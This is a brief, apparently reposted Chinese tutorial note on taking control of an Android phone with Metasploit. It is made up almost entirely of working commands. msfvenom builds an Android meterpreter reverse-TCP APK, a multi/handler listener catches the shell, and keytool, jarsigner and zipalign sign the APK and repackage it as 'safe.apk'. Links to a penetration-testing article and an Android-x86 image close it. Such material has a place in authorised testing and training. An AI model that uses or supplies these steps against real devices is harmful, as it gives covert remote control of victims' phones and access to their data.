Metasploit对安卓手机进行控制

1.in the server:  msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=4444 R > ./pentest.apk

http://resources.infosecinstitute.com/mobile-device-penetration-testing/

       use exploit/multi/handler

       Set PAYLOAD android/meterpreter/reverse_tcp

       SET LHOST 192.168.1.128

       SET LPORT 4444

        Exploit



in the kali:
2.keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
3.jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore pentest.apk alias_name
4.jarsigner -verify -verbose -certs pentest.apk
5.apt-get install zipalign
zipalign -v 4 pentest.apk safe.apk



Android https://code.google.com/archive/p/android-x86/downloads http://www.fosshub.com/Android-x86.html/android-x86-6.0-20160318.iso
原文地址:https://www.cnblogs.com/qdfu/p/5531198.html